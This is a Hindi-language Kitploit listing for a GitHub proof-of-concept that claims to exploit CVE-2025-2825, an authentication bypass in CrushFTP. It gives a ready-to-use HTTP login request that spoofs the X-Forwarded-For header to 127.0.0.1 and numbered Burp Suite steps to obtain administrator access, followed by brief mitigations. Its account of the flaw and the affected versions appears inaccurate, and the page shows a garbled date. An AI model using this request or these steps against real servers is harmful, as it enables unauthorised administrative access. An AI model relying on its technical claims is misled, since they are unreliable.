Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-2825-CrushFTP-AuthBypass — CVE-2025-2825 के लिए प्रमाणीकरण बायपास PoC – CrushFTP 10.x का शोषण | Kitploit
उपकरण/GitHubGitHub/shivshantp/cve-2025-2825-crushftp-authbypass
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंगपेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
shivshantp/cve-2025-2825-crushftp-authbypass

CVE-2025-2825-CrushFTP-AuthBypass

CVE-2025-2825 के लिए प्रमाणीकरण बायपास PoC – CrushFTP 10.x का शोषण

रिपॉजिटरी देखें
511 साल पहलेअभी तक समीक्षित नहीं

CVE Exploit-Status

🚨 CVE-2025-2825 – CrushFTP प्रमाणीकरण बायपास

🔎 अवलोकन

CVE-2025-2825 एक गंभीर प्रमाणीकरण बायपास भेद्यता है जो CrushFTP को प्रभावित करती है, जो एक व्यापक रूप से उपयोग किया जाने वाला सुरक्षित फ़ाइल स्थानांतरण सर्वर है। यह दोष रिमोट हमलावरों को हेडर स्पूफिंग करके लॉगिन प्रमाणीकरण को बायपास करने और प्रशासनिक पहुँच प्राप्त करने की अनुमति देता है — सर्वर को यह सोचने पर मजबूर करता है कि अनुरोध लोकलहोस्ट से आया है।

  • गंभीरता: गंभीर
  • CVSS स्कोर: 9.8
  • हमला वेक्टर: रिमोट
  • प्रभावित संस्करण: CrushFTP < v10.6.0
  • ठीक किया गया: v10.6.0 और उससे ऊपर
  • स्थिति: जंगली में सक्रिय शोषण के तहत

🧠 तकनीकी विवरण

यह भेद्यता X-Forwarded-For हेडर के अनुचित सत्यापन के कारण उत्पन्न होती है। जब यह हेडर 127.0.0.1 पर सेट किया जाता है, तो सर्वर अनुरोध को स्थानीय मानता है — प्रमाणीकरण को बायपास करता है।


🧪 प्रूफ ऑफ कॉन्सेप्ट (PoC)

🔸 HTTP अनुरोध उदाहरण:

root@kitploit:~
GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1  
Host: target-ip  
X-Forwarded-For: 127.0.0.1

📝 target-ip को लक्ष्य CrushFTP सर्वर के वास्तविक IP पते से बदलें।

यदि सफल होता है, तो सर्वर प्रमाणीकरण को बायपास करता है और पहुँच प्रदान करता है — गलत क्रेडेंशियल के साथ भी।


🔗 PoC पायथन स्क्रिप्ट

📄 cve-2025-2825-poc.py


🛠️ उपयोग किए गए उपकरण और प्रौद्योगिकियाँ

  • पायथन – एक्सप्लॉइट स्क्रिप्टिंग
  • Burp Suite – HTTP हेडर को इंटरसेप्ट और संशोधित करना
  • Wireshark – पैकेट कैप्चर और विश्लेषण
  • Nmap – पोर्ट स्कैनिंग और सेवा गणना
  • CrushFTP – कमजोर लक्ष्य उदाहरण
  • GitHub – PoC और दस्तावेज़ प्रकाशित करने के लिए

📝 पुनरुत्पादन के चरण

  1. CrushFTP का एक कमजोर संस्करण (v10.5 या उससे पहले) सेट करें।
  2. Burp Suite का उपयोग करके लॉगिन अनुरोध को इंटरसेप्ट करें।
  3. HTTP अनुरोध हेडर को संशोधित करें:
    root@kitploit:~
    X-Forwarded-For: 127.0.0.1
    
  4. अनुरोध को अग्रेषित करें।
  5. मान्य क्रेडेंशियल के बिना प्रशासक पहुँच प्रदान की जाती है।

✅ शमन

  • CrushFTP v10.6.0 या उससे ऊपर अपग्रेड करें।
  • X-Forwarded-For जैसे हेडर को साफ और मान्य करें।
  • प्रशासक पहुँच को लोकलहोस्ट या VPN/फ़ायरवॉल के पीछे प्रतिबंधित करें।
  • संदिग्ध पहुँच पैटर्न के लिए लॉग की निगरानी करें।

👨‍💻 लेखक

Shivshant Patil
प्रमाणित नैतिक हैकर (CEH v13)
B.Tech कंप्यूटर इंजीनियरिंग स्नातक
🔗 LinkedIn Profile 🔗 Github Profile


📚 संदर्भ

  • 🔗 Official CrushFTP Security Advisory
  • 🔗 NVD Entry - CVE-2025-2825
  • 🔗 PacketStorm Security
टूल डाउनलोड करें